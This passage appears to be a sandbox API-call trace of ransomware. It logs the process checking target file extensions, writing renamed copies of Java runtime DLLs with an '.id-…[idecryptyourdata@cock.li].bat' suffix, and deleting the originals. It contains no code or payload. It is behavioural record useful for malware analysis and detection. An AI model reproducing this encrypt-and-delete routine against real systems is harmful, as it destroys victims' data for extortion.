(lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.013] lstrlenW (lpString=".doc") returned 4 [0197.014] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString=".docx") returned 5 [0197.014] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0197.014] lstrlenW (lpString=".pdf") returned 4 [0197.014] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString=".xls") returned 4 [0197.014] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString=".xlsx") returned 5 [0197.014] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0197.014] lstrlenW (lpString=".ppt") returned 4 [0197.014] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.014] lstrlenW (lpString=".zip") returned 4 [0197.014] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString=".rar") returned 4 [0197.014] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.014] lstrlenW (lpString=".bz2") returned 4 [0197.014] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.014] lstrlenW (lpString=".7z") returned 3 [0197.014] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.014] lstrlenW (lpString=".dbf") returned 4 [0197.014] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.014] lstrlenW (lpString=".1cd") returned 4 [0197.014] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 53 [0197.014] lstrlenW (lpString=".jpg") returned 4 [0197.014] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.015] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.015] lstrlenW (lpString="jawt.dll") returned 8 [0197.015] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.015] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=14400) returned 1 [0197.015] CloseHandle (hObject=0x3a8) returned 1 [0197.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll")) returned 0x20 [0197.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.016] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.016] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.016] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.016] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.016] GetLastError () returned 0x0 [0197.016] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x3840, lpOverlapped=0x0) returned 1 [0197.250] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x3850, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x3850, lpOverlapped=0x0) returned 1 [0197.251] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.251] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.251] SetEndOfFile (hFile=0x35c) returned 1 [0197.251] CloseHandle (hObject=0x35c) returned 1 [0197.251] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.251] SetEndOfFile (hFile=0x3a8) returned 1 [0197.252] CloseHandle (hObject=0x3a8) returned 1 [0197.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.252] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawt.dll")) returned 1 [0197.253] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.253] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.253] lstrlenW (lpString=".doc") returned 4 [0197.253] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString=".docx") returned 5 [0197.253] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.253] lstrlenW (lpString=".pdf") returned 4 [0197.253] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString=".xls") returned 4 [0197.253] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString=".xlsx") returned 5 [0197.253] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.253] lstrlenW (lpString=".ppt") returned 4 [0197.253] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.253] lstrlenW (lpString=".zip") returned 4 [0197.253] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString=".rar") returned 4 [0197.253] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.253] lstrlenW (lpString=".bz2") returned 4 [0197.254] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.254] lstrlenW (lpString=".7z") returned 3 [0197.254] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString=".dbf") returned 4 [0197.254] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString=".1cd") returned 4 [0197.254] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString=".jpg") returned 4 [0197.254] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString=".doc") returned 4 [0197.254] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.254] lstrlenW (lpString=".docx") returned 5 [0197.254] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.254] lstrlenW (lpString=".pdf") returned 4 [0197.254] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.254] lstrlenW (lpString=".xls") returned 4 [0197.254] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.254] lstrlenW (lpString=".xlsx") returned 5 [0197.254] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.254] lstrlenW (lpString=".ppt") returned 4 [0197.254] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.254] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.254] lstrlenW (lpString=".zip") returned 4 [0197.254] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.255] lstrlenW (lpString=".rar") returned 4 [0197.255] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.255] lstrlenW (lpString=".bz2") returned 4 [0197.255] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.255] lstrlenW (lpString=".7z") returned 3 [0197.255] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.255] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.255] lstrlenW (lpString=".dbf") returned 4 [0197.255] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.255] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.255] lstrlenW (lpString=".1cd") returned 4 [0197.255] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.255] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jawt.dll") returned 47 [0197.255] lstrlenW (lpString=".jpg") returned 4 [0197.255] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.255] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.255] lstrlenW (lpString="jfr.dll") returned 7 [0197.255] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.256] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=26688) returned 1 [0197.256] CloseHandle (hObject=0x3a8) returned 1 [0197.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll")) returned 0x20 [0197.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.256] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.256] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.256] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.256] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.257] GetLastError () returned 0x0 [0197.257] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x6840, lpOverlapped=0x0) returned 1 [0197.420] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x6850, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x6850, lpOverlapped=0x0) returned 1 [0197.421] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.421] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe2, lpOverlapped=0x0) returned 1 [0197.421] SetEndOfFile (hFile=0x35c) returned 1 [0197.421] CloseHandle (hObject=0x35c) returned 1 [0197.421] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.422] SetEndOfFile (hFile=0x3a8) returned 1 [0197.423] CloseHandle (hObject=0x3a8) returned 1 [0197.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.423] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll")) returned 1 [0197.423] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.423] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.423] lstrlenW (lpString=".doc") returned 4 [0197.423] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.423] lstrlenW (lpString=".docx") returned 5 [0197.423] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0197.423] lstrlenW (lpString=".pdf") returned 4 [0197.423] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.423] lstrlenW (lpString=".xls") returned 4 [0197.424] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString=".xlsx") returned 5 [0197.424] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0197.424] lstrlenW (lpString=".ppt") returned 4 [0197.424] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString=".zip") returned 4 [0197.424] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString=".rar") returned 4 [0197.424] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString=".bz2") returned 4 [0197.424] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.424] lstrlenW (lpString=".7z") returned 3 [0197.424] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString=".dbf") returned 4 [0197.424] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString=".1cd") returned 4 [0197.424] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString=".jpg") returned 4 [0197.424] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.424] lstrlenW (lpString=".doc") returned 4 [0197.424] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.424] lstrlenW (lpString=".docx") returned 5 [0197.424] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0197.424] lstrlenW (lpString=".pdf") returned 4 [0197.425] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.425] lstrlenW (lpString=".xls") returned 4 [0197.425] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.425] lstrlenW (lpString=".xlsx") returned 5 [0197.425] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0197.425] lstrlenW (lpString=".ppt") returned 4 [0197.425] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.425] lstrlenW (lpString=".zip") returned 4 [0197.425] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.425] lstrlenW (lpString=".rar") returned 4 [0197.425] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.425] lstrlenW (lpString=".bz2") returned 4 [0197.425] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.425] lstrlenW (lpString=".7z") returned 3 [0197.425] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.425] lstrlenW (lpString=".dbf") returned 4 [0197.425] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.425] lstrlenW (lpString=".1cd") returned 4 [0197.425] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll") returned 46 [0197.425] lstrlenW (lpString=".jpg") returned 4 [0197.425] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.425] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.425] lstrlenW (lpString="jli.dll") returned 7 [0197.425] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.426] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=174656) returned 1 [0197.426] CloseHandle (hObject=0x3a8) returned 1 [0197.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll")) returned 0x20 [0197.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.426] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.427] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.427] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.427] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.427] GetLastError () returned 0x0 [0197.427] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x2aa40, lpOverlapped=0x0) returned 1 [0197.516] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x2aa50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x2aa50, lpOverlapped=0x0) returned 1 [0197.520] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.520] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe2, lpOverlapped=0x0) returned 1 [0197.520] SetEndOfFile (hFile=0x35c) returned 1 [0197.521] CloseHandle (hObject=0x35c) returned 1 [0197.521] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.521] SetEndOfFile (hFile=0x3a8) returned 1 [0197.524] CloseHandle (hObject=0x3a8) returned 1 [0197.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.524] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll")) returned 1 [0197.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.524] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.524] lstrlenW (lpString=".doc") returned 4 [0197.524] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.524] lstrlenW (lpString=".docx") returned 5 [0197.524] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0197.524] lstrlenW (lpString=".pdf") returned 4 [0197.524] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.524] lstrlenW (lpString=".xls") returned 4 [0197.525] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.525] lstrlenW (lpString=".xlsx") returned 5 [0197.525] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0197.525] lstrlenW (lpString=".ppt") returned 4 [0197.525] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString=".zip") returned 4 [0197.525] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.525] lstrlenW (lpString=".rar") returned 4 [0197.525] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.525] lstrlenW (lpString=".bz2") returned 4 [0197.525] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.525] lstrlenW (lpString=".7z") returned 3 [0197.525] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString=".dbf") returned 4 [0197.525] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString=".1cd") returned 4 [0197.525] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString=".jpg") returned 4 [0197.525] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.525] lstrlenW (lpString=".doc") returned 4 [0197.525] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString=".docx") returned 5 [0197.526] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0197.526] lstrlenW (lpString=".pdf") returned 4 [0197.526] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString=".xls") returned 4 [0197.526] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString=".xlsx") returned 5 [0197.526] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0197.526] lstrlenW (lpString=".ppt") returned 4 [0197.526] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.526] lstrlenW (lpString=".zip") returned 4 [0197.526] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString=".rar") returned 4 [0197.526] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.526] lstrlenW (lpString=".bz2") returned 4 [0197.526] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.526] lstrlenW (lpString=".7z") returned 3 [0197.526] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.526] lstrlenW (lpString=".dbf") returned 4 [0197.526] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.526] lstrlenW (lpString=".1cd") returned 4 [0197.526] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.526] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 46 [0197.526] 